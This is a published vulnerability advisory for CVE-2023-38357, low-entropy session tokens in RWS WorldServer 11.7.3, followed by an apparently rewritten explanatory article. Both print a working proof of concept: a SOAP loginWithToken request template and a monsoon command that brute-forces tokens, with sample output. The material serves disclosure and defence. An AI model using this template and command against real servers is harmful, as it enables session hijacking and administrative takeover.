RWS WorldServer 11.7.3 - Session Token Enumeration

Exploit Author: RedTeam Pentesting GmbH Analysis Author: www.bubbleslearn.ir Category: WebApps Language: Shell Published Date: 2023-07-20

Exploit Title: RWS WorldServer 11.7.3 - Session Token Enumeration
Session tokens in RWS WorldServer have a low entropy and can be
enumerated, leading to unauthorised access to user sessions.


Details
=======

Product: WorldServer
Affected Versions: 11.7.3 and earlier versions
Fixed Version: 11.8.0
Vulnerability Type: Session Token Enumeration
Security Risk: high
Vendor URL: https://www.rws.com/localization/products/additional-solutions/
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2023-001
Advisory Status: published
CVE: CVE-2023-38357
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38357


Introduction
============

"WorldServer offers a flexible, enterprise-class translation management
system that automates translation tasks and greatly reduces the cost of
supporting large volumes of local language content."

(from the vendor's homepage)


More Details
============

WorldServer associates user sessions with numerical tokens, which always
are positive values below 2^31. The SOAP action "loginWithToken" allows
for a high amount of parallel attempts to check if a token is valid.
During analysis, many assigned tokens were found to be in the 7-digit
range of values. An attacker is therefore able to enumerate user
accounts in only a few hours.


Proof of Concept
================

In the following an example "loginWithToken" request is shown:

-----------------------------------------------------------------------
POST /ws/services/WSContext HTTP/1.1
Content-Type: text/xml;charset=UTF-8
SOAPAction: ""
Content-Length: 501
Host: www.example.com
Connection: close
User-Agent: agent

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" 
xmlns:soapenv="http://schemas.xmlsoap.org">
     <soapenv:Header/>
     <soapenv:Body>
        <com:loginWithToken soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
           <token xsi:type="xsd:string">FUZZ</token>
        </com:loginWithToken>
     </soapenv:Body>
</soapenv:Envelope>
-----------------------------------------------------------------------

It can be saved as file "login-soap.req" and be used as a request
template for the command-line HTTP enumerator monsoon [1] to achieve
many parallel requests:

-----------------------------------------------------------------------
$ monsoon fuzz --threads 100 \
--template-file login-soap.req \
--range 1-2147483647 \
--hide-pattern "InvalidSessionException" \
'https://www.example.com'

Target URL: https://www.example.com/

   status   header     body   value    extract

      500      191      560   5829099
      500      191      556   6229259
      200      191     3702   7545136
      500      191      556   9054984
[...]
processed 12000000 HTTP requests in 2h38m38s
4 of 12000000 requests shown, 1225 req/s
-----------------------------------------------------------------------

The --range parameter reflects the possible value range of 2^31 and for
each value an HTTP request is sent to the WorldServer SOAP API where the
FUZZ marker in the request template is replaced with the respective
value. Also responses are hidden which contain "InvalidSessionException"
as these sessions are invalid. Responses will yield a status code of 200
if an administrative session token is found. For an unprivileged user
session, status code 500 is returned.


Workaround
==========

Lower the rate at which requests can be issued, for example with a
frontend proxy.


Fix
===

According to the vendor, upgrading to versions above 11.8.0 resolves the
vulnerability.


Security Risk
=============

Attackers can efficiently enumerate session tokens. In a penetration
test, it was possible to get access to multiple user accounts, including
administrative accounts using this method in under three hours.
Additionally, by using such an administrative account it seems likely to
be possible to execute arbitrary code on the underlying server by
customising the REST API [2]. Thus, the vulnerability poses a high risk.


Timeline
========

2023-03-27 Vulnerability identified
2023-03-30 Customer approved disclosure to vendor
2023-04-03 Requested security contact from vendor
2023-04-06 Vendor responded with security contact
2023-04-14 Advisory sent to vendor
2023-04-18 Vendor confirms vulnerability and states that it was already
known and fixed in version 11.8.0.
2023-07-03 Customer confirms update to fixed version
2023-07-05 CVE ID requested
2023-07-15 CVE ID assigned
2023-07-19 Advisory released

References
==========

[1] https://github.com/RedTeamPentesting/monsoon
[2] https://docs.rws.com/860026/585715/worldserver-11-7-developer-documentation/customizing-the-rest-api


RedTeam Pentesting GmbH
=======================

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/


Working at RedTeam Pentesting
=============================

RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:
https://jobs.redteam-pentesting.de/

-- 
RedTeam Pentesting GmbH                   Tel.: +49 241 510081-0
Alter Posthof 1                           Fax : +49 241 510081-99
52062 Aachen                    https://www.redteam-pentesting.de
Germany                         Registergericht: Aachen HRB 14004
Geschäftsführer:                       Patrick Hof, Jens Liebchen

RWS WorldServer 11.7.3 – Session Token Enumeration Vulnerability: A Deep Dive into High-Risk Exploitation

Security vulnerabilities in enterprise software often go unnoticed until exploited in real-world attacks. One such critical flaw was identified in RWS WorldServer, a widely used translation management system, affecting versions up to 11.7.3. The vulnerability, designated as CVE-2023-38357, stems from weak session token generation—specifically, low entropy session tokens that can be easily enumerated by attackers. This article examines the technical underpinnings, real-world implications, and mitigation strategies for this high-risk vulnerability.

Understanding Session Token Enumeration

Session tokens are cryptographic identifiers used to maintain user authentication state across HTTP requests. In secure systems, these tokens are generated using high-entropy random algorithms—making them unpredictable and resistant to brute-force attacks. However, in RWS WorldServer 11.7.3, session tokens are based on sequential, predictable numeric values, typically falling within the 7-digit range (e.g., 1,000,000 to 9,999,999).

This low entropy allows attackers to systematically test token values across a limited range. The SOAP-based loginWithToken endpoint enables parallel, high-volume testing—making brute-force enumeration feasible within hours, even with modest resources.

Exploitation Mechanism: The Proof of Concept

Attackers leverage the loginWithToken SOAP action to validate session tokens. The request structure is straightforward, as demonstrated below:


POST /ws/services/WSContext HTTP/1.1
Content-Type: text/xml;charset=UTF-8
SOAPAction: ""
Content-Length: 501
Host: www.example.com
Connection: close
User-Agent: agent

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" 
xmlns:soapenv="http://schemas.xmlsoap.org">
 <soapenv:Header/>
 <soapenv:Body>
 <com:loginWithToken soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
 <token xsi:type="xsd:string">FUZZ
 </com:loginWithToken>
 </soapenv:Body>
</soapenv:Envelope>

This template can be used with automated tools like monsoon, a command-line HTTP enumerator, to perform large-scale parallel requests across the token range.

Automated Enumeration with monsoon

Using the monsoon tool, attackers can execute thousands of requests per second:


$ monsoon fuzz --threads 100 \
--template-file login-soap.req \
--range 1-2147483647 \
--hide-pattern "InvalidSessionException" \
'https://www.example.com'

Here’s what each parameter means:

--threads 100: Enables 100 parallel HTTP requests, maximizing throughput.
--range 1-2147483647: Covers the full 31-bit integer range (2^31 − 1), though most tokens fall in the 7-digit range.
--hide-pattern "InvalidSessionException": Filters out responses indicating invalid tokens, focusing only on successful login attempts (HTTP 200).
https://www.example.com: The target URL hosting the vulnerable WorldServer instance.

Output from the attack shows multiple HTTP 200 responses, indicating valid session tokens. For example:

Status	Header Size	Body Size	Token Value
200	191	3702	7545136
500	191	556	9054984

These results confirm that attackers can identify active sessions in real time—potentially gaining access to sensitive translation workflows, user data, and administrative controls.

Security Risk and Real-World Impact

While the vulnerability may seem theoretical, its practical impact is severe:

Unauthorized Access: An attacker can hijack any user session by enumerating the token, bypassing authentication entirely.
Privilege Escalation: If the system allows session reuse across roles, an attacker may gain access to administrative functions.
Insider Threat Amplification: If tokens are reused or not invalidated after logout, attackers can maintain persistent access.
Massive Data Exposure: Translation projects often contain proprietary content, legal documents, and sensitive customer information.

Given that WorldServer is used by enterprises in finance, healthcare, and government sectors, the risk of data leakage or compliance violations is extremely high.

Vendor Response and Patching

RWS acknowledged the issue and released a fix in WorldServer 11.8.0. The updated version implements cryptographically secure session token generation, ensuring high entropy and resistance to enumeration.

However, organizations still running 11.7.3 or earlier remain at risk. Many enterprises delay updates due to legacy integrations or complex deployment environments—making this vulnerability a persistent threat.

Best Practices for Mitigation

To prevent exploitation of session token enumeration vulnerabilities, organizations should adopt the following security best practices:

Use Random, High-Entropy Tokens: Ensure session tokens are generated using cryptographically secure random number generators (e.g., crypto.randomBytes in Node.js or UUID.randomUUID() in Java).
Limit Token Lifetime: Implement session expiration and invalidate tokens after logout or inactivity.
Rate Limiting: Restrict the number of login attempts per IP or user, especially for SOAP endpoints.
Monitor for Suspicious Activity: Log and alert on unusual patterns, such as high-volume token testing.
Regular Patching: Maintain up-to-date software versions and apply security patches promptly.

Conclusion: The Importance of Secure Session Management

The CVE-2023-38357 vulnerability in RWS WorldServer 11.7.3 serves as a stark reminder that even enterprise-grade systems can harbor fundamental flaws in session management. Low entropy tokens, combined with exposed SOAP APIs, create a perfect storm for exploitation.

As cybersecurity professionals, we must prioritize secure session design—ensuring tokens are unpredictable, short-lived, and protected against enumeration. This case underscores the need for continuous vulnerability assessment, proactive patching, and robust monitoring in all enterprise environments.